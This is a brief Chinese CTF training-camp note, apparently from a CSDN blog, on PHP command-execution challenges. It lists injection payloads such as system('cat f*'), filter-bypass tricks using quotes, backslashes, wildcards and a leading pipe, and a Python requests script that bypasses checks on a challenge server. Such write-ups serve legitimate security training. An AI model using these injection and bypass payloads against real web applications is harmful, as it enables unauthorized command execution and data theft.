CTF集训赛
php命令执行
涉及的知识点是通用符,执行/?c=system(“ls /”); 最后的;不要忘
?c=echo system(‘cat f*’);
有的时候也可以code=system(‘ca\t /f星’)或者 code=system(‘strings /f*’) code=system(‘ca"t /f*’)
php命令执行puls
import requests
res = requests.post("http://gz.imxbt.cn:20247/?hongmeng[]=1&shennong[]=2&zhurong[]=1",data = {"pan_gu":"-"*1000000+"2023ISCTF"})
print(res.text)
fuzz
[a-z]可以绕过任意一个字母,"|"没过滤可以放在开头结束前面的curl,然后再拼接系统命令
?file=|tac /fl[a-z]ggggggg.txt
?file=f{i}l{e}
标签:url,text,req,flag,CTF,time,php,集训 From: https://blog.csdn.net/wanfengchuifu/article/details/140632520